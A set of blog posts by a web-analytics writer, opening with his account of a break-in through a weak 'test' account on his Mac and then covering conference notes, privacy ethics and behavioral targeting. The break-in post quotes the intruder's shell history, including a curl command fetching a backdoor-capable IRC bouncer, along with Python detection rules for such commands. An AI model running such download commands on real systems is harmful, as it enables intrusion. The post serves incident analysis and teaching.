The Break-in

The Scary Door by musicalwds

I am so ashamed.

I was once a system & network manager, so I know about things like bad passwords and scanning software. Later, I built firewalls for Sun. Lately I’ve lectured on the importance of locking down your web analytics data, and the precautions you need to take. So imagine my shock to discover that my home desktop Mac was broken into. Yep. I had enabled remote logins through my firewall, which is innocent enough, but during a fit of debugging some USB problems, I set up a new user named “test” with a password of .. you guessed it. I remember at the time thinking “don’t pick ‘test’ as a user name, and certainly don’t use it as the password” but I was in a hurry and I did it anyway. I finished my debugging, but forgot about the account.

Oh, and of course, I set it up with full administrator privileges.

Tonight I’m poking through my log files (I’m still debugging for the source of this USB error on my system, it’s driving me nuts), and I notice that some scanning software came by today, trying to log into zillions of accounts. I was smugly scrolling through the list of user names it was trying until I got to “test” and … it didn’t log in. It didn’t know the password. I first thought, holy crap, I left that account enabled. Then I thought, how could it not guess the password?

The reason: because somebody else had, three days ago. And changed it.

I brought up a Terminal window, and typed “last test” which gives me a list of the previous logins. Sure enough, some fine program/human had logged in to my system three days ago, and stayed for 1 minute. So I went to the “test” home directory, where I conveniently found a list of what happened when they logged in:

1. w
2. passwd
3. uname -a
4. exit
5. cd /var/tmp
6. mkdir " "
7. cd " "
8. curl -O geocities.com/myhael_ilie/psyd,tar.gz
9. curl -O geocities.com/myhael_ilie/psyd,tar.gz
10. exit

Translation:

  1. See who’s on.
  2. Change the password for user “test”.
  3. See what kind of system this is.
  4. Logout.
  5. Go to a folder commonly used for temporary files.
  6. Create a folder named “ ” (just a single space).
  7. Change to that folder.
  8. Download a file from the web.
  9. Try the download again.
  10. Give up, and log out.
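The same kind of review can be automated. What follows is only a minimal sketch: the rules are hypothetical ones written to match this particular session, not a general intrusion detector, and `RULES` and `flag_commands` are names invented for the illustration.

```python
import re

# Hypothetical rules, chosen only because they match the session above.
RULES = [
    ("changes a password", re.compile(r'^passwd\b')),
    ("downloads a file", re.compile(r'^(curl|wget)\b')),
    ("uses a whitespace-only directory name", re.compile(r'^(mkdir|cd)\s+"\s+"$')),
]

def flag_commands(history):
    """Return (command, reason) pairs for every command that matches a rule."""
    flagged = []
    for command in history:
        for reason, pattern in RULES:
            if pattern.search(command.strip()):
                flagged.append((command, reason))
    return flagged

# The commands found in the "test" home directory, in order.
history = [
    "w",
    "passwd",
    "uname -a",
    "exit",
    "cd /var/tmp",
    'mkdir " "',
    'cd " "',
    "curl -O geocities.com/myhael_ilie/psyd,tar.gz",
    "curl -O geocities.com/myhael_ilie/psyd,tar.gz",
    "exit",
]

flagged = flag_commands(history)
for command, reason in flagged:
    print(f"{command!r}: {reason}")
```

Five of the ten commands get flagged here. A careful intruder would simply erase the history file, so a check like this only helps against the careless ones.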

So why did the curl commands fail? It’s because I use Little Snitch, which asks my permission every time a random command tries to access the Internet. Since I wasn’t at the computer at the time, I never gave my OK, and Little Snitch prevented the ‘curl’ from working. The person would have seen this:

curl: (7) Failed to connect to 66.218.77.68: Host is down

So what was in psyd,tar.gz? Well, actually it’s a typo. The real name doesn’t have a comma in it, but the person who logged in didn’t notice the mistake because of the “host is down” message. I grabbed the correct file and took a look at it. It is psyBNC, an “IRC bouncer” that can also be used to install backdoors and other nastiness. The file contains the complete source code, as well as a fully functioning Mac executable.

Fortunately, that’s the end of the story. Several lessons here, ones which I’ve told others far too many times:

  1. Do what you can to prevent break-ins.
  2. Log everything so you can figure out how the inevitable break-in happened.
  3. Convenience is often at the expense of security.
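Lesson 2 only pays off if somebody actually reads the logs. Here is a minimal sketch of tallying failed logins per user name and flagging the ones aimed at accounts that really exist. It assumes sshd-style "Failed password" lines; the exact wording varies by OS and sshd version, and the sample lines, addresses and account names below are made up for the illustration.

```python
import re
from collections import Counter

# Assumed log format: OpenSSH-style "Failed password" messages.
FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+)")

def failed_logins_by_user(lines):
    """Count failed password attempts per user name."""
    counts = Counter()
    for line in lines:
        match = FAILED.search(line)
        if match:
            counts[match.group(1)] += 1
    return counts

# Made-up sample lines; the addresses come from documentation-only ranges.
sample_log = [
    "sshd[411]: Failed password for invalid user admin from 203.0.113.9 port 4022 ssh2",
    "sshd[412]: Failed password for invalid user guest from 203.0.113.9 port 4023 ssh2",
    "sshd[413]: Failed password for test from 203.0.113.9 port 4024 ssh2",
    "sshd[414]: Failed password for test from 203.0.113.9 port 4025 ssh2",
    "sshd[415]: Accepted password for bob from 192.0.2.10 port 5000 ssh2",
]

counts = failed_logins_by_user(sample_log)

# Hypothetical list of accounts that exist on this machine.
known_accounts = {"bob", "test"}
targeted = sorted(user for user in counts if user in known_accounts)
print(targeted)
```

A failed attempt against a name that doesn't exist is noise. A failed attempt against a name that does exist, like a forgotten "test" account, is the line worth stopping on.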

I was incredibly lucky. A simple sudo bash would have given this person root access, and they could have erased everything on my system, or worse. In fact, they could have, and then erased all traces of what they did, but I have enough logging and checks to know that they didn’t do anything but what’s described above.

I humbly admit all of this in the hope that you can learn from my near miss.

And yes, I removed the “test” account.


The Behavioral Targeting Penguin

Hi kids! Today the cute and cuddly Mr. Penguin from AOL will answer all your questions on behavioral targeting! Isn’t he cute! Now you know that behavioral targeting is your friend!

Have a good day! And a tip o’the cap to the Good People at AOL who keep Mr. Penguin in anchovies in return for a little education gig he does for them.

PS oh, and did you know that Google doesn’t track you around the web? Hahahahahahaha!

PPS Seriously, why doesn’t AOL focus on the benefits of BT — like that the ads you’ll get are actually relevant? I am also concerned that they are confusing BT with tracking across an ad network. They are not the same. As it is, what I see from the storyboard is I get a TRACKING COOKIE ON MY COMPUTER followed closely by somebody thinking “I should remove that cookie”… is BT the new cookie? Is the cookie the new cookie?


Notes on Emetrics Summit San Francisco 2007

Another Emetrics has come and gone. Many of the Summit’s highlights have been presented in other blogs, but I did want to point out a few personal observations:

Big News and Rumors: Eric Peterson strikes out on his own, a new Google Analytics, and WebSideStory changes its name to Visual Sciences. But the biggest question I kept getting was “how do you feel about having to work for Microsoft?”

Attendees: Wow. There were a lot of people. Many faces from Emetrics Santa Barbara 2005 and 2006, but lots of new faces as well. The surge in attendees meant I was running into a lot of people new to web analytics, but I also took note of people representing sub-specialties such as SEO and SEM, now as legitimate peers of web analytics. I don’t remember the number of attendees, but there’s no way all of us would have fit in the Four Seasons in Santa Barbara.
Emetrics Crowd
Kudos to Jim Sterne for having the foresight to move the Summit to a larger venue this year. The Palace Hotel kept up the high standards.

Hiring! Anyone who was hiring stuck a green dot on their badge. There were LOTS of green dots. If you’re interested in web analytics, it seems there’s a job for you, somewhere!
Emetrics SF Badge
Special thanks to Eric Peterson for announcing on stage that the Yahoo! data team is looking to hire over 120 people. Eric, I owe you one – or several. For everyone else .. send resumes!

Vendors: All the vendors you’d expect were there, showing their latest. One vendor was even promoting a sniffer technology, so you didn’t have to manually tag pages – wow! Unlike Santa Barbara, where the vendors were in the same room as the presenters, in SF there was a separate “vendor room.” That increased the times available for product demos, but it did mean attendees needed to make a special trip to the room. The genius move was to put the mid-morning and mid-afternoon snacks at the back of the vendor room, which no doubt increased traffic.
Emetrics SF Vendors
And no, the floor wasn’t really sloped.

Blogger’s Lunch: Unfortunately I was on conference calls until 1:30 Monday, so I missed the blogger’s lunch table. In fact, I missed lunch… and Jim’s keynote…

Google Analytics: You’ve no doubt already seen the buzz about the new Google Analytics. What you probably don’t know is that Jeffrey Veen gave a really great presentation. It took him a while to get his Mac projecting, but Brett Crosby did a good tap dance, and the eventual presentation was well worth it. I don’t know if he was using PowerPoint or Keynote or what, but the screen animations looked like somebody offscreen was doing a live demo.
Jeff Veen demos Google Analytics
After the presentation, I asked Somebody Who Would Know about MeasureMap, the blog analytics technology Google bought and then seemed to bury. Did the new Google Analytics contain all that MeasureMap goodness? With a wink and a smile, I was told that MeasureMap isn’t dead, but I got the impression that if I was told more, I would have to be killed. So I got a Google Analytics T-shirt instead.

The Sessions: Of course the sessions are the reasons most people go to Emetrics. As usual, some of them were fabulous and others were take-it-or-leave-it. Unlike previous years, there were so many presenters that much of the summit ran in four tracks. That made it a bit of a challenge to get to every talk I wanted to see. However, four presentations stood out for me.

First was Bryan Eisenberg’s Persuasion Architecture talk. I love how Bryan brings reality into analytics. Persuasion Architecture focuses on outcomes, not activities. Amen to that!

Second was Joseph Carrabis’ talk “Quantifying and Optimizing the Human Side of Online Marketing.” Honestly, the title sounded a bit dry and I wasn’t sure why I wandered into that particular room. (I’m sure Joseph could say!) But immediately, I was captivated. First, you need to understand that this talk had nothing to do with web analytics. Second, Joseph comes across like Robin Williams as a professor — he read his material from a script, but packed so many asides and ad libs into the presentation — all relevant — that it was fascinating to witness. He had five points to make, and after 50 minutes, had only covered the first two. He asked the crowd which of the final three we’d like him to cover, and everybody said “all of them! We’ll stay!” Keep in mind, this was the last session of the day and people were getting ready for Web Analytics Wednesday (read: free drinks). That’s how good he was – everyone stayed another 30 minutes. Since returning from the Summit, I’ve been looking up Joseph’s other writings, and my hope is to have him come speak at Yahoo! sometime.

Aside: check out the game. I have no idea what this is, but I hope one day Joseph reveals his findings.

Third was a talk from Seth Romanow and Chris Worland from Microsoft where they coined the term “personamous” to talk about personalized content to anonymous visitors. (During the talk, Seth said personamous.com was still available. A week later as I write this summary, it’s still available.) The reason why this session stood out for me was that they had three main lessons. Two of them (stuff interest/activity data in the cookie, rather than in a central database, and avoid a recommendation engine) were the opposite of what Yahoo! does. My hope is that they came to the conclusions they did based on the time and available resources to get the job done. Yahoo!’s been doing this for 12 years, so we may be talking on a very different time/resource/focus scale.
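For anyone wondering what “stuff the interest data in the cookie” might look like, here is a minimal sketch. It is not what Seth and Chris presented; they showed no code that I'm reproducing here. The cookie name, the 30-day lifetime and the category labels are all assumptions made up for the illustration.

```python
import json
from collections import Counter
from http.cookies import SimpleCookie
from urllib.parse import quote, unquote

COOKIE_NAME = "interests"  # hypothetical cookie name

def read_interests(cookie_header):
    """Parse per-category view counts out of a Cookie request header."""
    cookie = SimpleCookie()
    cookie.load(cookie_header or "")
    if COOKIE_NAME not in cookie:
        return Counter()
    return Counter(json.loads(unquote(cookie[COOKIE_NAME].value)))

def write_interests(interests):
    """Build a Set-Cookie header value that carries the counts."""
    cookie = SimpleCookie()
    # URL-quote the JSON so the value contains only cookie-safe characters.
    cookie[COOKIE_NAME] = quote(json.dumps(interests, sort_keys=True))
    cookie[COOKIE_NAME]["max-age"] = 30 * 24 * 3600  # assumed 30-day lifetime
    cookie[COOKIE_NAME]["path"] = "/"
    return cookie[COOKIE_NAME].OutputString()

def record_view(cookie_header, category):
    """Add one page view for a category and return the new Set-Cookie value."""
    interests = read_interests(cookie_header)
    interests[category] += 1
    return write_interests(interests)

# Simulate an anonymous visitor: the browser sends back only "name=value".
header = ""
for category in ["books", "books", "kitchen"]:
    set_cookie = record_view(header, category)
    header = set_cookie.split(";")[0]

profile = read_interests(header)
top_interest = profile.most_common(1)[0][0]
print(top_interest)
```

No central database is involved, which is the appeal. The trade-off is that the profile lives on the visitor's machine, unsigned and editable, so a real site would have to treat it as untrusted input.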

Finally, Tim Hart of the J. Paul Getty Trust really nailed how web analytics can help you align your web site with your mission. While he was presenting, I was reminded of Xavier Casanova’s presentation last year where he used web analytics to help his startup figure out positioning, messaging and buzz.

Privacy / Ethics: I had more than a handful of people tell me they’ve been thinking about ethics of web data. During the WAA meeting on Sunday, Jim Sterne made a call for a WAA Ethics Task Force. Alex Langshur and I talked about how important privacy guidelines were to the public sector web sites – something I hadn’t previously considered. René Dechamps Otamendi brought in the European angle. I’m very glad to see an increased level of awareness and interest — and I’m looking forward to additional discussions.

Web Analytics Wednesday (on Tuesday): There was a great turnout for Web Analytics Wednesday, the social event for web analytics geeks – you know who you are. More recruiting ensued… A number of us then migrated to the WAW after-party, which meant actually leaving the hotel. I don’t think we lost too many people along the way.

There’s an unwritten law that any post about Emetrics has to have a photo of either Jim Sterne or Eric Peterson. Since I mentioned Jim’s “Godfather” video already, and because Eric’s now on his own, here’s Eric, wondering when Andy Benkert (center) and I are going to get the hell out of the doorway:
Bob Andy and Eric at Emetrics WAW
The sign on Andy reads: “Web Analytics Wednesday (on Tuesday) After Party.” Many thanks to June Dershewitz for organizing this WAW!

It was great to meet and/or re-meet so many people. The LinkedIn connections are flying, so we’ll all stay in touch — at least until October, when Emetrics moves to Washington DC.

Other Emetrics summaries (list is in no way complete):


Protecting Citizens’ Private Data

Fed 06 Report Card
USA Today is running a couple of opinion pieces, one (apparently staff-written) questioning how well the US government is doing with information security, and calling for more accountability. The report card recently issued by Rep. Tom Davis, R-Va., of the House Oversight and Government Reform Committee, doesn’t look so good. The opinion piece concludes that while the Office of Management and Budget (OMB) is trying to lock things down through stricter process, things are going to get worse.

Meanwhile, a rebuttal from Clay Johnson, deputy director for management of the OMB, says the government is “significantly strengthening the protection of citizens’ personal data” by asking the agencies to police themselves, and running a consumer awareness campaign.

Last month, the Identity Theft Task Force issued a Strategic Plan. You can read the plan and supplemental materials on the Task Force web site.


Lars Johansson: Some Good Interviews

Lars Johansson, the Swedish coordinator for the WAA, has a web site and blog. One interesting thing he does is ask questions of different people who are involved in the Web Analytics field, and publish the conversation on the site.

Today, Lars posted a batch of new interviews, including Phil Kemelor regarding industry differences across the pond, Avinash Kaushik about his book, and yours truly about web analytics ethics.

Don’t miss the Jim Sterne video!


Web Analytics Ethics

Two years ago, sitting in the airplane after attending Emetrics 05 Santa Barbara (and having to leave early), I penned a letter to organizer Jim Sterne, asking him if he’d bring up some issues around web data privacy at the first Web Analytics Association general meeting. Turns out he didn’t get my email until after the meeting, but it resonated with him and he circulated it within the WAA.

Nothing came of that initial email, but Jim didn’t forget it. A year ago, he asked if I’d be interested in a speaking slot at Emetrics ’06 Santa Barbara to talk about web privacy issues, which I gladly accepted. Not only did Jim invite me to speak, he put me on first – presumably in order to help set the tone for the summit. I got a good reception, but again, nothing really came of it.

This year I’ll be at Emetrics 07 San Francisco, and while I’m not speaking, I still think the issue deserves consideration. In fact, I think it’s more front and center than ever, with items such as Google’s recent announcement that they’ll be anonymizing their search logs after 18-24 months.

Against this backdrop, and in the spirit of keeping this alive, here’s the original email I sent to Jim, verbatim:

June 3, 2005, 05:24 AM

Jim -

Greetings from Boston. Thank you for the wonderful Emetrics conference;
it exceeded my expectations and I hated to leave early.

I'm unable to attend the WAA meeting this morning, but I did want to
have you possibly bring up for discussion the role that WAA wants to
play with respect to privacy of data collected/used by the WAA members,
and, in a larger context, some of the ethics around using and
protecting access to the data.

My current mental state (it's 4am California time, and I haven't had
any sleep) prevents me from presenting a coherent case, but here are
some thoughts:

With the recent news on personal privacy leaks, and even Citibank
running ads highlighting identity theft, I suspect it is only a matter
of time before the government decides it's time to step in and
legislate on the issue.  If that happens, I'm convinced that the strong
arm of the legislature will come down with a set of guidelines and
regulations that will rival Sarbanes-Oxley. Just as SOX has spawned an
entire compliance industry (and fattened the wallets of lawyers,
accountants and auditors) and caused a massive re-engineering effort, I
think a parallel will emerge around data access and security - where
procedures need to be meticulously documented, controls need to be put
in place for every piece of data, and systems will need to be built to
audit compliance.

Web analytics as an industry has largely ignored issues of data access,
modification, sharing and integration, having (rightly) focused on
getting the most use of the data.

But there are practical questions to ask. Some examples:

 - if you are surfing books at Amazon and not logged in, and later in
the same visit, you log in and look at kitchen appliances, should
Amazon add to your interest profile the books you searched while logged
out? I think most consumers would say no, they are unrelated.

 - what if you were at Amazon putting books in your shopping cart, and
then went to check out and said "yes, I have an account"? I think most
consumers would say yes, the convenience is worthwhile.

 - if you are searching Yahoo Personals and not logged in, and later
log in to read your Mail, should Yahoo add to your interest profile the
personal ads you looked at while logged out?

I think most users expect that logged out behavior is treated
differently at Yahoo (in fact, Yahoo's privacy policy mandates it), but
where is the line?

 - should consumers have access to the information collected about
them?  Can they opt-out of such collection, or change the data? How
would one control access (and make sure we were showing information
only to the correct people)?

 - should data collection policies (e.g. downloadable toolbars, "web
accelerator" proxies, etc) default to "opt-out" for data collection,
and have consumers explicitly opt-in before data can be collected?

 - should there be an acceptable use policy for cookies?  e.g.
duration, standard naming convention describing use, when cookies
should not be used, when cookie data should be encrypted, etc?

 - how do these policies impact targeting, computation of unique users,
visit lengths, user value, etc?

 - how long should we keep data about users?

These issues impact all of the WAA: advocacy, technology, education,
standards, research, etc.  These kinds of questions guide what the WAA
does, and should "baked in" to the DNA of the organization. Thus I
think it's appropriate to have a discussion about it.

I've spoken with several people about this issue, and the immediate
reaction is that this is a job for lobbyists. I don't agree. The WAA
advocacy team will no doubt do a fine job lobbying lawmakers on best
practices, once the Association formulates its stance.

However, any
data privacy laws that governments may pass will only be the lowest
bar. While as analysts and marketers, we'd like to see the bar be up to
us to set, I don't think that will last long-term. I think we should
assume that a bar *will* be set. However I don't think that's what we
should shoot for.  Consider - as practitioners, we want to practice
"safe data" and stay above the bar. One way to do that is to layer
policies on top of the laws.  Another is to layer values on top of the
policies.

I suggest that the WAA take up the discussion of what values we stand
for.  Should web analytics practitioners, especially ones that have the
good sense to join the WAA, take an oath similar to the hippocratic
oath that doctors take? Should practitioners be held to an ethical
standard for the privilege of having access to the data?

We are not dealing with life and death issues here, but we are dealing
with issues of trust.  We've seen that one of the reasons we have data
quality issues is that people delete cookies and they delete cookies
because they don't trust web sites to use the cookies responsibly. We
also know that if consumers have more trust, they will use the web
more, and transact more, so it's in our best interests to increase the
trust that consumers feel.

While a larger "data access oath" may be out of scope for the WAA -
indeed, I can see an argument that an umbrella data ethics group emerge
- I don't want to try to boil the ocean. But is it worth having a
discussion about what values the WAA holds, and in turn, expects from
its members?

I look forward to the thoughts that will come out of the meeting.

Bob

PS timely:
http://news.yahoo.com/news?tmpl=story&cid=582&e=1&u=/nm/20050603/wr_nm/tech_privacy_dc

I boiled the essence of this letter into a PowerPoint presentation that I used at Emetrics last year. The presentation is purposefully without any fancy design in order that the message be front and center. You have my permission to do what you want with it. During the Q & A after the talk, I said I could imagine a cataclysmic event that would set into motion things like congressional hearings on data privacy. I referred to it as the Chernobyl of Data. Fortunately, it hasn’t happened, and of course I hope it doesn’t. But I continue to be concerned about a head-in-the-sand mentality within the web analytics community, and what it will ultimately mean once the hammer comes down – in any form.

I’m interested in your thoughts. Is it time to join together as an industry to tackle this?


Google Analytics

Somebody asked me for my reaction to the announcement that Google has decided to make Urchin free. I already said it once:

A nice way to get even more off-network data is to supply folks with a hosted analytics service that most small and medium-sized web sites can use. Simply put a web bug / beacon in your page, and we’ll track your visitors for you. And for us.


Getting something for nothing

Eric offers the advice

Don’t expect something for nothing.

What are surfers willing to do to get personalized content?

In May, ChoiceStream did an email survey of 923 U.S. online adults, and found that consumers want personalized content, but they are wary of using methods like click tracking to inform the personalization. Not only that, but they are less willing to provide information or allow tracking than they were a year ago:
Choicestream Personalization Survey

Not too encouraging. And if 68% of visitors are opposed to using click and purchase tracking in order to provide what many people actually want — personalization — is it any wonder that they don’t see the value in cookies?


Who Are You?

http://www.flickr.com/photos/photojo/27602762/

I was recently told

I looked at your ‘about’ page. it’s more about what you do than who you are.

Fair enough, and a good observation. But how does one define who one is? I’m thinking specifically about web analytics and user tracking. We want to provide compelling content (or products, services, etc) that engage users. The best way to do that is to know who they are.

Traditionally, web sites have used several means for determining who you are, including

  • demo- or biographical – age, gender, income, education, etc.
  • attitudinal – what do you think? do you like hockey?
  • geographical – where do you live? work? travel to?
  • behavioral – What do you read? What do you buy? When do you do it?

Of course there are also random factoids, like “what’s your favorite swear word?” Sometimes the answers are insightful, sometimes entertaining, but usually they are of little value.

Back at Accrue, customers and prospects used to ask me if I had recommendations for survey tools, and how to combine log data with registration data, because without them they couldn’t “personalize” the experience for the visitor. At first I was baffled by this, and used to tell a (fictitious) story:

I go to the same coffee shop every morning, and have been doing so for six months. I order roughly the same thing every day. I know the first names of the three servers, and they know my first name, and what I like.

When I go to the coffee shop, they recognize me, they treat me like a valued customer, and they anticipate my desires based on my previous behavior. They never asked me how, and they certainly didn’t follow me around to see where I lived or worked. They just paid attention.

Here’s the thing. What you do is more observable, more accurate, and more informative than your answers to a registration or survey form. If you’ve ever heard the phrases “do what you say you will do” or “actions speak louder than words” then you know what I’m talking about. And yet I see registration forms on web sites when there’s no good reason to have them. My guess is that there are three reasons:

  1. Some of these web sites are run by folks that have come from the offline media, where behavioral tracking is impossible, so they don’t think about it.
  2. Some of these web sites don’t have useful behavioral tracking, so are trying to make up for it by asking you tons of demographic questions.
  3. Some of these web sites have wonderful tracking, but no way to act on the data they collect. In short, they can’t personalize, or target, based on behavioral data.
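Acting on behavior doesn't have to be elaborate. As a minimal sketch of the coffee-shop idea, here is a function that suggests a visitor's “usual” only when the observed history shows a clear habit. The function name and both thresholds are hypothetical, picked for the illustration rather than taken from any real system.

```python
from collections import Counter

def usual_order(order_history, min_visits=5, min_share=0.6):
    """Return the item ordered most often, or None if there is no clear habit."""
    if len(order_history) < min_visits:
        return None  # not enough visits to presume anything
    item, count = Counter(order_history).most_common(1)[0]
    if count / len(order_history) >= min_share:
        return item
    return None

regular = ["latte"] * 8 + ["tea"] * 2
newcomer = ["latte", "tea"]
browser = ["latte", "tea", "mocha", "chai", "cocoa"]

print(usual_order(regular))
print(usual_order(newcomer))
print(usual_order(browser))
```

No form, no survey: the only input is what the visitor actually did. Returning nothing for the newcomer and the browser matters as much as the suggestion itself, since guessing on thin evidence is not paying attention.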

Of course getting things in balance is key. I buy everything with one credit card. But if my credit card company started sending me very personalized offers based on my behavior, I might get freaked out about the privacy implications, and start using other credit cards, or paying with cash. So I want you to pay attention, but not too much.
